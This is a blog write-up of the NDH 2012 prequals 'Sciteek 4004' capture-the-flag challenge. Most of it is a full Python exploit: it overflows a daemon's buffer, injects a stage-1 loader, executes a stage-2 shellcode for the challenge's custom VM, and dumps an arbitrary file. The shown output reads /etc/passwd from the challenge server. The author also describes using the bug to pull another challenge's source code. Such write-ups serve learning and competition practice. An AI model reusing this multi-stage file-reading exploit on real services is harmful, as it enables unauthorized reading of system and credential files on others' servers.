codezen.fr code hacking, zen coding

26Mar/12Off

NDH 2012 Prequals – Sciteek 4004 Write-up – Multistage file reader

Posted by aXs

The daemon on port 4004 is a fairly simple daemon that check for a password (hard-coded in the binary) and just says "You are authenticated".

What's interesting is that this daemon is running on the same server that many other challenges so we used it to fetch files and solve the URL Shortener challenge more easily by retrieving its Python source.

We have limited space for the shellcode, only 100 bytes. While you can totally read files in a 100 bytes shellcode if you don't care about error checking, I wanted something cleaner (that's the excuse for spending time to do a multi-stage exploit loader)

This exploit will:
- overflow the buffer (size is 0x100)
- Inject stage 1 loader
- Read Stage 2 from stdin
- Execute Stage 2
- Read filename to dump from stdin
- Open file with error checking
- Dump the file using a read/write loop, so you can dump file bigger than the memory
- Exit

#!/usr/bin/env python

import socket
import sys
import time
from struct import pack

if len(sys.argv) != 4:
  print '\nUsage:\t./sciteek4004.py [host] [port] [filename]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = s.recv(65536)
print 'Received', repr(data)

''' Stage 2 '''
''' Read filename from stdin, output to stdout '''

sc  = "\x04\x02\x01\x00\x00"  # movl r1, 0x0
sc += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
sc += "\x04\x02\x02\x94\x7a"  # movl r2, 0x7b94
sc += "\x04\x02\x03\x32\x00"  # movl r3, 0x32
sc += "\x30"      # syscall (read)

sc += "\x04\x02\x00\x02\x00"  # movl r0, 0x2
sc += "\x04\x02\x01\x94\x7a"  # movl r1, 0x7b94
sc += "\x04\x02\x02\x00\x00"  # movl r2, 0x0
sc += "\x04\x00\x03\x02"  # movl r3, r2
sc += "\x30"      # syscall (open)

sc += "\x18\x02\x00\xff\xff"  # cmpl r0, 0xffff
sc += "\x10\x39\x00"    # jz +57

sc += "\x04\x00\x07\x00"  # mov r7, r0

sc += "\x04\x00\x01\x00"  # movl r1, r0
sc += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
sc += "\x04\x02\x02\x00\x10"  # movl r2, 0x1000
sc += "\x04\x02\x03\xff\x00"  # movl r3, 0x32
sc += "\x30"      # syscall (read)

sc += "\x18\x01\x00\x00"  # cmpl r0, 0x0
sc += "\x10\x1a\x00"    # jz +26

sc += "\x04\x00\x03\x00"  # movl r3, r0
sc += "\x04\x02\x00\x04\x00"  # movl r0, 0x4
sc += "\x04\x02\x01\x01\x00"  # movl r1, 0x1
sc += "\x04\x02\x02\x00\x10"  # movl r2, 0x1000
sc += "\x30"      # syscall (write)

sc += "\x04\x00\x00\x07"  # mov r0, r7

sc += "\x16\xc7"    # jmps -47

sc += "\x04\x02\x00\x01\x00"  # movl r0, 0x1
sc += "\x30"      # syscall (exit)

''' Stage 1 Loader '''

loader  = "\x04\x02\x01\x00\x00"  # movl r1, 0x0
loader += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
loader += "\x04\x02\x02\x00\x60"  # movl r2, 0x6000
loader += "\x04\x02\x03"    # movl r3, 0x32
loader += pack("<H", len(sc))   #   -continued
loader += "\x30"      # syscall (read)
loader += "\x04\x02\x00\x00\x60"  # movl r2, 0x6000
loader += "\x19\x03\x00"    # call *r0

if len(loader) > 100:
  print "\nShellcode too long: ", len(loader), "\n"
  sys.exit(1)

print "Shellcode size: ", len(loader), "\n"

payload = '\x02' * (100 - len(loader)) # Nopsled

print "Nopsled size: ", len(payload), "\n"

payload += loader

payload += "\x94\x7f" # To Nopsled

print "Payload size: ", len(payload), "\n"

# Send Stage 1 Loader

s.send('%s' %payload);

time.sleep(2)

# Send Stage 2

s.send('%s' %sc);

time.sleep(2)

# Send filename to download

s.send('%s' %sys.argv[3] + "\x00\n");

while 1:
    line = s.recv(65536)
    if not line:
        break
    print line

s.close()

Result:

$ python sciteek4004.py sciteek.nuitduhack.com 4004 "/etc/passwd"
Received 'Password (required): '
Shellcode size: 29

Nopsled size: 71

Payload size: 102

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spo
ol/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin

Share